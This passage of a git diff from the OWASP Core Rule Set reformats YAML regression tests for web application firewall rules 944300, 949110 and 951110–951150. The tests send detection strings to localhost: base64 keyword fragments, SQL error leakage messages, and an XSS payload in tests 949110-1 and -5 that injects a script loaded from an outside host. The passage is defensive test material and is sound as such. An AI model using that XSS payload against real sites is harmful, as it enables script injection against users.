log_contains: "id \"944300\"" - - test_title: 944300-317 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 317 desc: "Content-Type text/plain includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HdoaWxlY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-318 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HdoaWxlY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 318 desc: "Content-Type application/json arg value includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-319 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}" + output: + log: + expect_ids: [944300] + - test_id: 319 desc: "Content-Type application/json arg name includes keyword HdoaWxlY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-320 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 320 desc: "Argument test includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-321 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=B3aGlsZWNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 321 desc: "Argument name includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "B3aGlsZWNsb3N1cmU=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-322 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU=test" + output: + log: + expect_ids: [944300] + - test_id: 322 desc: "Cookie test includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=B3aGlsZWNsb3N1cmU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-323 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=B3aGlsZWNsb3N1cmU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 323 desc: "Cookie name includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: B3aGlsZWNsb3N1cmU=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-324 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: B3aGlsZWNsb3N1cmU=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 324 desc: "Request header test includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: B3aGlsZWNsb3N1cmU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-325 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: B3aGlsZWNsb3N1cmU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 325 desc: "XML attribute value includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-326 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 326 desc: "XML element value includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-327 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 327 desc: "Nested XML element value includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-328 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 328 desc: "Content-Type text/plain includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=B3aGlsZWNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-329 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=B3aGlsZWNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 329 desc: "Content-Type application/json arg value includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-330 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}" + output: + log: + expect_ids: [944300] + - test_id: 330 desc: "Content-Type application/json arg name includes keyword B3aGlsZWNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}" - output: - log_contains: "id \"944300\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}" + output: + log: + expect_ids: [944300] diff --git a/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml b/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml index 33c049b..90685d5 100644 --- a/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml +++ b/tests/REQUEST-949-BLOCKING-EVALUATION/949110.yaml @@ -1,92 +1,91 @@ --- meta: author: "studersi, azurit" - enabled: true - name: "949110.yaml" description: | Test whether the inbound blocking mechanism works by testing whether rule 949110 is triggered. For these tests, existing test are repurposed with different assertions. Instead of asserting that the original rules are triggered that the tests are written for, we assert that triggering these rules causes the blocking rule to be triggered. +rule_id: 949110 tests: - - test_title: 949110-1 + - test_id: 1 desc: Test is basically identical to 941100-1 (XSS positive test in phase 2) but here we assert that the inbound blocking mechanism is triggered stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "949110" - - test_title: 949110-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [949110] + - test_id: 2 desc: Test is basically identical to 941100-4 (XSS negative test in phase 2) but here we assert that inbound blocking mechanism is not triggered stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Referer: http://www.coreruleset.org - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: id "949110" - - test_title: 949110-3 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get" + headers: + User-Agent: "OWASP CRS test agent" + Referer: http://www.coreruleset.org + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [949110] + - test_id: 3 desc: Test is basically identical to 920100-9 (protocol enforcement negative test in phase 1) but here we assert that the inbound blocking mechanism is not triggered stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "OPTIONS" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/options" - version: "HTTP/1.1" - output: - no_log_contains: "id \"949110\"" - - test_title: 949110-4 + - input: + dest_addr: "127.0.0.1" + method: "OPTIONS" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/options" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [949110] + - test_id: 4 desc: Test is basically identical to 920100-10 (protocol enforcement positive test in phase 1) but here we assert that inbound blocking mechanism is triggered stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "REALLYLONGUNREALMETHOD" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"949110\"" - - test_title: 949110-5 + - input: + dest_addr: "127.0.0.1" + method: "REALLYLONGUNREALMETHOD" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [949110] + - test_id: 5 desc: Test is basically identical to 949110-0 (see above) but here we assert that the scores are summed up and reported properly stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "Inbound Anomaly Score Exceeded [(]Total Score: " + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/get/demo/xss/xml/vuln.xml.php?input=setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + match_regex: 'Inbound Anomaly Score Exceeded \(Total Score: ' diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml index b6df65d..cf9e40a 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951110.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951110.yaml" - description: "Regression tests for rule 951110" +rule_id: 951110 tests: - - test_title: 951110-1 + - test_id: 1 desc: "Matching Microsoft Access SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body":"[match sql-errors.data]the used select statements have different number of columns[/match]: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression"} - output: - log_contains: "id \"951110\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body":"[match sql-errors.data]the used select statements have different number of columns[/match]: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression"} + output: + log: + expect_ids: [951110] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml index 1c9318b..84bc18f 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951120.yaml @@ -1,29 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951120.yaml" - description: "Regression tests for rule 951120" +rule_id: 951120 tests: - - test_title: 951120-1 + - test_id: 1 desc: "Matching Oracle SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL Error: ORA-00933: SQL command not properly ended"} - - output: - log_contains: "id \"951120\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL Error: ORA-00933: SQL command not properly ended"} + output: + log: + expect_ids: [951120] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml index a7c83ef..beb26bb 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951130.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951130.yaml" - description: "Regression tests for rule 951130" +rule_id: 951130 tests: - - test_title: 951130-1 + - test_id: 1 desc: "Matching DB2 SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: DB2 SQL Error: SQLCODE=-104, SQLSTATE=42601, SQLERRMC=DECLARE"} - output: - log_contains: "id \"951130\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: DB2 SQL Error: SQLCODE=-104, SQLSTATE=42601, SQLERRMC=DECLARE"} + output: + log: + expect_ids: [951130] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml index c550314..25fcdcf 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951140.yaml" - description: "Regression tests for rule 951140" +rule_id: 951140 tests: - - test_title: 951140-1 + - test_id: 1 desc: "Matching EMC SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [DM_QUERY_E_SYNTAX]error: \"A Parser Error (syntax error) has occurred in the vicinity of: select * from dm_folder where folder in\""} - output: - log_contains: "id \"951140\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: [DM_QUERY_E_SYNTAX]error: \"A Parser Error (syntax error) has occurred in the vicinity of: select * from dm_folder where folder in\""} + output: + log: + expect_ids: [951140] diff --git a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml index 2e02f92..161aaea 100644 --- a/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml +++ b/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml @@ -1,28 +1,27 @@ --- meta: author: "azurit" - enabled: true - name: "951150.yaml" description: "Regression tests for rule 951150" +rule_id: 951150 tests: - - test_title: 951150-1 + - test_id: 1 desc: "Matching firebird SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the 